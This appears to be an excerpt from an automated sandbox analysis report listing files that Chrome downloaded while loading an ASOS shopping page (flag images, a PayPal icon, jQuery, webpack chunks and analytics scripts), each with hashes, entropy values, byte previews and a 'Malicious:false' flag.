                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB.........IDATx..]}l......;..+.....+N...;. .....6.....*....*...R.W.....R9..T...B...$.B.$Rh. ...vc.v..G..?.......n..y.n}9.}..fo..../..y3..<....8o|t.V].Vi~.J..U.i....g*...b.q.p$%...RIiM%..N...r~~....W7.k.....u.M.....7k.w............`.fra..mJ#...R>ZE.%..X ..Q...o1')ko..?....Nn.I...^.T.F...q.).?......i.....||..$?S.x.c....K_.$..9d{.n:w.k2f.(..:g.>.PCjG..|..5.W!......?..x.(.;3~..3..)....g..Q....`'.c9.^ZI.7n.3.2=.q....^....<.9../r....J.9(..#..h...ggw.19.....a...y....7....K.....h.N(.k........7..kc-.:R..N:r.%(..{....{..)..{.?t.......(+.`..3H~!.Hg..,$..{.}H.]m....n.Y...j.....A..i......,....hll....Nzw.oE^$.x.4~..=`.2.....p.ut...y..Oq....my.m......H6{..g..w...R...8\\.....36.6...g..<......v....j..6.........w.\0n..y...o[...ue....L......)..X.W.....0K.;...Rww7....:V.X.....9.....:.C.....O}...7|..A..}.=....}...c.i......v..V.ZE%%%b\f.lhmm..947.6.Z....Q....x.P....z..'X...(....+.-.........|......FGG7....e..`N..7g%.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):4148
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.009644422435151
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:+dYj4lvHFflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJg6:+OjO9N26MT0D5MdtbZPAVwzV2FDGKTw
                                                                                                                                                                                                                                                                                      MD5:AEA3F60A4572696E9B27683A9AE84E97
                                                                                                                                                                                                                                                                                      SHA1:9D658FFCA30339020065BB00112DCA08BD6CD40F
                                                                                                                                                                                                                                                                                      SHA-256:8D30479054381B32AB7E1564474346745A6BCDF5FBBDD7110A1B7260A5C9EE0E
                                                                                                                                                                                                                                                                                      SHA-512:7D5F2204BA8DDDA28EFFA4A6162232C028BD42D61C7774DA76A6ABB279C517B6B53C10DC45216E28D0654C511650A932F2AE77E9764DD83B99AA5E22814EB307
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://images.asos-media.com/navigation/pay-pal-png
                                                                                                                                                                                                                                                                                      Preview:... ftypavif....avifmif1miafMA1A....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............e.................[...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......`...<....pixi............av1C. .....Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):5251
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.9565996287313965
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:uAyv/RGhcSveQIh/15grzRsy7uc4zamdXWMjl/4Hs+Duixj2IRk4C:9mGyfQMNq7kamJ7JqTDvjlA
                                                                                                                                                                                                                                                                                      MD5:60C9CC3825ADC832284FD90757C37ADB
                                                                                                                                                                                                                                                                                      SHA1:9816C325E87F9C139C86C4CA26D364263E6B57CA
                                                                                                                                                                                                                                                                                      SHA-256:4B2575CF62363CAD5DDEBDFB8CA4F8DA40156FFEF1754537E659CD023D806087
                                                                                                                                                                                                                                                                                      SHA-512:CB8B478440C9CC8982CF0CFAA886E7EBB6CC01A71003F3DE2E3BA41E7DF55E8673AC9E805B1F84FF5EDC702B56986701FB215B56F63D3A6B00C53B4DD37D3F69
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/storesa/images/flags/au.png
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB........=IDATx..].x.E...I2..M.#..$..11...l...*.....z....c.Y@].U....(.|..@.E...+.%..$wf.9....d2.. ...}_......~...{.^$......U..T.6...H=.iV+......NM.H.r.=..I54..2:..RHs.P...@.*.Gr6.-.Z..g..p......0...ix-.}....#b.e.$(.;!+.........l..f).).j..........M........1.,.[..@7....t.e.G..|zh....|w....{.~...Em-.+.....#]Q&...G....WZ&.z.....`.>.$..Xs....<..U.r....9..,.VA.....O//t_2.a...D.._.......Ua.........z:.k.K....B.......F....<.v.:;.j.%.>K...U.S/.._o:...D"A.c...<(..p.X.^^..~..dwm...N....^l..K ..k..~...{.....06..U.0k...V'(.I.F]Ih......."x.E.Rq5.....?:...=....#M(..A(.~.t9|....u..>...]...U.0...1p..prk...>...'.:.^...5..x%.:k...0Q.6......-J.........V...........uN..|.N+~Z"......9..j....4...:.....}.G.h.'..'$i..~3s....}.....x...)8........M.....}.........g....*.&.M_..<.*g..(..7W@..j..<{...O.....H._*..`..R..8_..R.. b.S..<.55F.y.g...C..`... #*.n..ByH...4....v-.0..a.P.C.S..]C...rBE.... .]..d.j.....w"=....j..&.!.`.x.V.vC..,<."Q.E..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):340171
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.901819913769712
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:XO6aVJaJ9CnDm4FczOM97Z1881Y/81Mw1dFiu9l3ZxGTFMLbV:XO6kaJYnDm4FuOM97Zj1Y/81Mw13iW3F
                                                                                                                                                                                                                                                                                      MD5:4D06FE97A9DDA3920697D1AE0AD93D75
                                                                                                                                                                                                                                                                                      SHA1:A05A6EEC88DD125655DDB9E7AB246EB4228A7A90
                                                                                                                                                                                                                                                                                      SHA-256:004030398AC96C5560387BA2D1E826327F9F3F4AA51217550A9CE6073E34C95C
                                                                                                                                                                                                                                                                                      SHA-512:96A46BAF0187A7D68CA7394982C3C8C980FBE8D0999B311D3040F3783470EAAFF03EDE6AF5E998F24940104AC8D7976B4FE7D07D90191828DDC6A16F2FC2968C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:(function(){mU();t6P();F6P();var Eq=function(TY,FQ){return TY|FQ;};var tN=function(bV){return -bV;};var bS=function(){Zm=["\x6c\x65\x6e\x67\x74\x68","\x41\x72\x72\x61\x79","\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72","\x6e\x75\x6d\x62\x65\x72"];};var Kq=function(Om,VW){return Om!==VW;};var DN=function nY(tE,Ul){'use strict';var pm=nY;switch(tE){case sK:{var GW=Ul[g2];var lT;nT.push(fV);return lT=GW&&HC(jE()[hl(S1)](P5,El,WC),typeof mv[br()[sN(qC)].call(null,JV,x3,lq,nS)])&&WW(GW[qN()[qV(dw)].apply(null,[rL,A3,x3,KK])],mv[br()[sN(qC)](Aw,x3,lq,nS)])&&Kq(GW,mv[WW(typeof br()[sN(JV)],'undefined')?br()[sN(wQ)](Aw,cw,f1,rl):br()[sN(qC)](ZE,x3,lq,nS)][WW(typeof q1()[fE(sw)],cL([],[][[]]))?q1()[fE(KY)].call(null,cT,O3):q1()[fE(S1)](hZ,lq)])?q1()[fE(mT)].call(null,vR,nW):typeof GW,nT.pop(),lT;}break;case xR:{nT.push(OV);try{var AN=nT.length;var CL=I1([]);var TW;return TW=I1(I1(mv[WW(typeof qN()[qV(Mw)],cL([],[][[]]))?qN()[qV(gl)](LQ,DL,Y3,bE):qN()[qV(gN)](I1(I1([])),I1(I1(qC)),mW,rU)][br()[s
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3339)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):3415
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.76169598667777
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:0h5hVbhByDhBhjE8hLhYhWhLqhchnhT6XEvshzhpwhv9sF8Xx:0h5hVbhByDhBhjVhLhYhWhLqhchnhuzs
                                                                                                                                                                                                                                                                                      MD5:BB4C55761E0BF2440C63900CEE1202A7
                                                                                                                                                                                                                                                                                      SHA1:AD24FD87E5429D8357CC21B31970EDAA4466C5DC
                                                                                                                                                                                                                                                                                      SHA-256:42CB235ECBD9D1D131F379C7C0F6FB0D52F7F643BEA9D9BA1CBA01D3F39D686E
                                                                                                                                                                                                                                                                                      SHA-512:1BB254091DCED688CA5D828CB72F06F77301BCCF9BE4EE4341C4560A66AE6E830679FCBC1AA61F09B316114E5CC900A845BC2AB6B77028A38A47793F9B19B0DA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/sitechromepublisher/client.sitechrome.deferred.1897f5341c56d1e99fd5.js
                                                                                                                                                                                                                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[546],{62476:(e,t,n)=>{n.d(t,{Z:()=>o});const o={close:"osdMOxg nJoGg3s"}},66023:(e,t,n)=>{n.d(t,{Z:()=>o});const o={Facebook:"J8Sftp9",Instagram:"mbXMayF",Snapchat:"CDRgBJC",Vk:"ZNHON6r"}},93819:(e,t,n)=>{n.d(t,{Z:()=>o});const o={deleteItem:"iWftf0U",deleteItemIcon:"ANCLgSx XmGonBy"}},81566:(e,t,n)=>{n.d(t,{Z:()=>o});const o={container:"oCe7D_L",product:"JWX9giR",voucher:"LKuNB8y",link:"e_Ko7LM EVhxZk8 leavesden2",image:"hK_95HO",details:"dLwsYMN ZHWKoMf leavesden3",price:"EmQ8iyH",item:"Je6Smy_",name:"ZlDAIIp",subscription:"RcMrzfR",meta:"fRrEDSy",colour:"ji3ec_g",size:"z3Jlz7A",quantity:"fv6LRW4",srOnly:"kTiVPVf AQi6YMD"}},46421:(e,t,n)=>{n.d(t,{Z:()=>o});const o={container:"_8m5CpA",current:"vx3UDYg TNLlZ7K london3",highlight:"IyFDfqo",previous:"p76OcV_ sOoULa1 leavesden4",rrp:"E6qPMvE sOoULa1 leavesden4",rrpLabel:"MRDNoo1"}},98438:(e,t,n)=>{n.d(t,{Z:()=>o});const o={pageOverlay:"sC6a41z",side:"uZHyLwH",fadeI
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):2438
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.883569731212677
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:N1jg47QuDeR7PoiVtoZ2XwmSfLQ3yHnNe/HNyyDo0GnRn+Ekpq:N1jg47Z6LoiUZOuDHnNe/tyao0GnAbc
                                                                                                                                                                                                                                                                                      MD5:E6FBABBCD80570A9DFA0386C25FA2C08
                                                                                                                                                                                                                                                                                      SHA1:D6B62AE10B83FE728788BCC00ED362847E1DF566
                                                                                                                                                                                                                                                                                      SHA-256:B7731EE671044B5581899B859A98227365A32ADBBBCDDF652BBDBED8E4F0DFDE
                                                                                                                                                                                                                                                                                      SHA-512:A80A7564C7280C0F3FE96FA0A697DD4C48394B0DF3C4B5F187D19EED07FAB3D35879F423B72A069963478B833E54C6555C18D7AF951384F2D48CC5E6412CCE52
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/storesa/images/flags/dk.png
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB........@IDATx...oTU...s.`ZZZZ..@.%...&,L}DP4.PcpK.nt.....n\.H\..H.....G....4..."H.BK[.....e~....{g.)3.G...<~..{^s..\F.f.k.?....t....777.N.:...3!.{Y.IO..fI.j.....R..H.K...../.....3..699..........333[.\Q..l}*.c.9.@..K..vi..+....f"E.A.... .|..RX..............&..Y.r.$..._kk.x.'.$..9.%P2Z..7..iY..eeV..-!.s.....Y...2...'.%3......W...'o.......&...].........b./qW..K.-(.Y.:. ..\.c..I..../o..7.'..|-_k.pH.h;%.....p...o.....Gz{{...E@T..iQ:.j9.T....k..d....N6.^......;O..s.....f....Jww.p..J.Z...SZ*..f.*."...|~...c.}..*$./ep...nJ..!........o.~.....j..SW....H...>i.n.|.g0\%..+..)}$w>>".?...j.*..A.|x1...A. ....._...O.^m....E.h}W....L.......Fur.:.-_.~.<>>..>.+>.;..Ri......z....&$.....^+Iu...*...x.......-h.$....}....of$3.#.Y.+u.d~9.P....hA.......^....93...-.&8.&Mq.\6....hA.........tFd.s.[.O.2.nA...eX4..MhCc........9......n.5..~BMz... .5j.X. -.a9..n[*`...fhB...h..:..xP..b....i...........hZW.jM...r@.V...:......M...t%..h.ch.~".>
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):19948
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.261902742187293
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                                                                                                                                                                      MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                                                                                                                                                      SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                                                                                                                                                      SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                                                                                                                                                                      SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015
                                                                                                                                                                                                                                                                                      Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:C source, ASCII text, with very long lines (65098)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):213725
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.361679936162521
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:z63NGm+mJgNeQQi8iqGHIKnJUtpT+BsbNLZ9ip0q:INGmYaGH5Urcso0q
                                                                                                                                                                                                                                                                                      MD5:F1D54743DBCC9A03EB08F14D0DE65DA4
                                                                                                                                                                                                                                                                                      SHA1:16B96431016B503517462F0797901AD8DAC94481
                                                                                                                                                                                                                                                                                      SHA-256:4E973E1B8E6B798931086CF372B83E40C417E33C0922087DAD0EB2F89FA891AC
                                                                                                                                                                                                                                                                                      SHA-512:209CC5643F2EFEB7E0EDD8CF015FCFF122BC355FE89694650A0CE7761FA1B22284A26CE218FE6A5337E9DCA6F7704A7AE523B997413338FF98AE10FC54804736
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:/*. * Copyright (c) 2011, Yahoo! Inc. All rights reserved.. * Copyright (c) 2011-2012, Log-Normal, Inc. All rights reserved.. * Copyright (c) 2012-2017, SOASTA, Inc. All rights reserved.. * Copyright (c) 2017-2022, Akamai Technologies, Inc. All rights reserved.. * Copyrights licensed under the BSD License. See the accompanying LICENSE.txt file for terms.. */./* Boomerang Version: 1.766.0 c28975a504c1aa46de14fe358f4875ace2917401 */..BOOMR_start=(new Date).getTime();function BOOMR_check_doc_domain(e){if(window){if(!e){if(window.parent===window||!document.getElementById("boomr-if-as"))return;if(window.BOOMR&&BOOMR.boomerang_frame&&BOOMR.window)try{BOOMR.boomerang_frame.document.domain!==BOOMR.window.document.domain&&(BOOMR.boomerang_frame.document.domain=BOOMR.window.document.domain)}catch(t){BOOMR.isCrossOriginError(t)||BOOMR.addError(t,"BOOMR_check_doc_domain.domainFix")}e=document.domain}if(e&&-1!==e.indexOf(".")&&window.parent){try{window.parent.document;return}catch(t){try{document
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65487)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):96951
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.288734807332958
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:NGIA2Bi9gxoGtW+Y2XBbx60BW7VB3P0o7UUGoQR3zbOsEwO3Vjq5Bk2PtVHMgT8T:Nmx8UZ2El4Fif71UXXg
                                                                                                                                                                                                                                                                                      MD5:E3E296E62F9ED48D9690B85B37CF7D2C
                                                                                                                                                                                                                                                                                      SHA1:57E75BCA4B8F9B6F9DF995A7545C21EC39034B34
                                                                                                                                                                                                                                                                                      SHA-256:0FD839C7A31E4EDC02934504F4588F468F021922519694AB4F821CB483B88E85
                                                                                                                                                                                                                                                                                      SHA-512:12A6B54D206E52C7E173100FF2BF73D4B6B7CE84E6AA030EA7A8A1FEDD09D764F4BC4778E8BD8F523208B1D951E3FCB2197FB3459FFD340B5638001097EC4F4A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/shared/jquery.742e47af.js
                                                                                                                                                                                                                                                                                      Preview:/*! v1.12.3, license file: jquery.LICENSE.txt */.!function(){"use strict";var e,t;e=window,t=function(e,t){var n=[],r=e.document,i=n.slice,o=n.concat,a=n.push,s=n.indexOf,u={},l=u.toString,c=u.hasOwnProperty,f={},d=function(e,t){return new d.fn.init(e,t)},p=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,h=/^-ms-/,g=/-([\da-z])/gi,m=function(e,t){return t.toUpperCase()};function v(e){var t=!!e&&"length"in e&&e.length,n=d.type(e);return"function"!==n&&!d.isWindow(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}d.fn=d.prototype={jquery:"1.12.3",constructor:d,selector:"",length:0,toArray:function(){return i.call(this)},get:function(e){return null!=e?e<0?this[e+this.length]:this[e]:i.call(this)},pushStack:function(e){var t=d.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e){return d.each(this,e)},map:function(e){return this.pushStack(d.map(this,(function(t,n){return e.call(t,n,t)})))},slice:function(){return this.pushStack(i.apply(this,argumen
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):2861
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.899673741861986
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:6iEECouYVFJ+3dAYolftq+1AMmwIT9RlUg4NiQwCAtm2Pj/9T9Z+BLwYaVulsnM+:6igHYvYolR1DdIT9RugWiQwCAp99iaVZ
                                                                                                                                                                                                                                                                                      MD5:7F0979E9A0C7CCD8B56C28C8EBA3AC03
                                                                                                                                                                                                                                                                                      SHA1:609FC9759AC7C45DFFE5A5187B291733A4CF801B
                                                                                                                                                                                                                                                                                      SHA-256:EFAEE361B8631ED1213F9795579DB451DA689380A4ACA4A741EBDC6F2F9C6499
                                                                                                                                                                                                                                                                                      SHA-512:16EF664F0E787A0CA5D0FE35B4C6DB3350919AA28DCC87C26BF18210B6B6E56A07CFC2138427535CCD00D70E14F99585870FE0359BD832F51FD36C476F17EBF7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/storesa/images/flags/fr.png
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB.........IDATx...o.G......1i.@h .C.....=...D.q.H..?..z..N......'.*..]+].S.,.?.T..A.^A.J9J.D..............{....:v^l.ewg.m?yf..gf...C...Zb..:>.p...T*.PQ./.M.(..b.[.Vq.l.G.....v..........f...=88.#..lgx.....+...Wc............../6[.UV..............^.,..._.<..1.r:...p8H.$b..g.UU.8.8'.Ib.H$.9....'.x!..........^.Y..fCU.b......s..7...w..\/2W=jjj...Fb..B..z.\.h......Q. ...-...J..-....:..>..E..n...{l...r2|.4..e..?_...fq@.f.A:GFF.q.Wo...d.|...R.;.ti.p..RQ.....n9..GS.N.."...h./?..EP...O....w3..LqJ.b.....7.w...4uH...=]...K..@O2.....p..js..f..(.....&.0)4D.v..y...>.U.....*.|O.....2.k.}..x....Tl.......Y..Wn....%+=K.ZDv.".Qj.-...5.}.....p...k6..'...H.T?...i.*...j..kc.v.~An.1......?:O.{4..0..da..p...5.....,.. QH....U.......%...Vy....../\.M..)y.._|...../.Tb3.9=mB..\.4.c...!u...~q.^|..2....m.......j.....n...<.Mx.We@t1.8..7(t.*..UJ.....EB.>..T...\....\.%^Jy+...=...=|.I...g.H.!.h...:<..Y..{g...%..%Q..G..F....mC#.N.W...E..-...'e..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (56943)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):57014
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.378838470596009
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:LfV8BFuXNhsWi6Ns8gMoqpfwTr6TdShTdDggwLYWrxj5+xjH+HAF1riaj14:6ksBEsComf6r6TdShTJggwLYWrxj5+xY
                                                                                                                                                                                                                                                                                      MD5:168008A26F9E32C4FC5449BAABBB8924
                                                                                                                                                                                                                                                                                      SHA1:021F48E00109F931F930042B0CC75732DE23AF16
                                                                                                                                                                                                                                                                                      SHA-256:194B419E7C48A7893691594652358A8F3029B71BC083FCB59DF98811ECEA4994
                                                                                                                                                                                                                                                                                      SHA-512:8CBD7C613D81965C91F0BE2ED9EE689B64864E26C93DDB28E88B060654BA03FE45EA7AC928F8D8ADDCA2146BF975EB45FD345F32AA465F886E628B2A67BB212D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e,t={76140:(e,t,n)=>{var r=n(60141);function i(e,t){!function(e,t){if(t.has(e))throw new TypeError("Cannot initialize the same private elements twice on an object")}(e,t),t.add(e)}function o(e,t,n){if(!t.has(e))throw new TypeError("attempted to get private field on non-instance");return n}function a(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function s(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?a(Object(n),!0).forEach((function(t){(0,r.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):a(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}n(93085),function(e,t){var n,a,c;if(/\.asos\.com$/i.test(e)&&!/local/i.test(e)?n="prod":(/\.asosservices\.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):2893
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.912925986158937
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:03cQdRHChzFYMl4FTpjPKEKTjdaLcI5G/60saAdikLRfJzVVwwYyaKxMdNzxzSFL:fQ+hz+Ml4TlKndatStHA8qBhVww3Md5s
                                                                                                                                                                                                                                                                                      MD5:C9D346C188F3406F1EDE034E90D5B5C1
                                                                                                                                                                                                                                                                                      SHA1:2EFC812A53CC7D79C9D64E309C4673D0067C07D1
                                                                                                                                                                                                                                                                                      SHA-256:C89F0F5DCDE39CA9E55FEA4859DE4FB69DDEEF96E935A59229899CACBDC633C6
                                                                                                                                                                                                                                                                                      SHA-512:43C0B13A21A94D5A8B81AF217B3675AC52D277A036DF03CBFCAB13E8D74EB784537F7A5311F0F71A248B3350E95DD2C3AF88D94191F519105162E28B0028799C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/storesa/images/flags/it.png
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB.........IDATx..[l......_../`7.C.L ..T$...DB...).1.J..U.Z...>....V.".@T.T.E&"-Q.RJ($......X.{.......Yv....w....i<3.:..w.w.w.5.<.`0....6..#..w..,.N.q..........h...d...l.v.];.z<...z...,.....wD"...o;.[.~5=..U..u...t:.:::.._.q.WM._.C............^.,..._....1..Z..l.XH.$b..g.U..8.8'.Ib.H$.9.....e.tA..{...}..k.d ..\..]...]....#...`..{o.n...\.....\..... i....%...0MNN.7..,.n..m....Q..L".P......}..[..$C.JZ..........*.H.\:H.......$.2.ax1... .N....:<H]..|...Q..W...<.d6...J...g(.:<n.Y.Z.to.qJQ.2..A....g.}y....4...,t...X......B{...^+..f...BQf.....4.....v.R..9Zw.[d;........TCZ...Gv..ph._.hj.A2.u....9x.._..n2..F.d.+. .{nQ......Z.5@n.,.~..72.9.*....hw..m}........A......e". .O..3.*.T..tqf.p..;[.|9r1...@......$.g..t.5g~...r..iD...O...o.K..)..7~.w.S.#...y.d...).n6..g.H.J....R6..g...}...n{......e%.^.E.xFk].P..].....hc.qR....k...j2.. $or4|^..F...K...6..q.u1B~...(...9_.$VD.m^p$tV.g.9....]..\.K`.K.....g+m.g..m.` z:Wm....J.9).\..<H
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2941
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.909276343163651
                                                                                                                                                                                                                                                                                      Encrypted:false
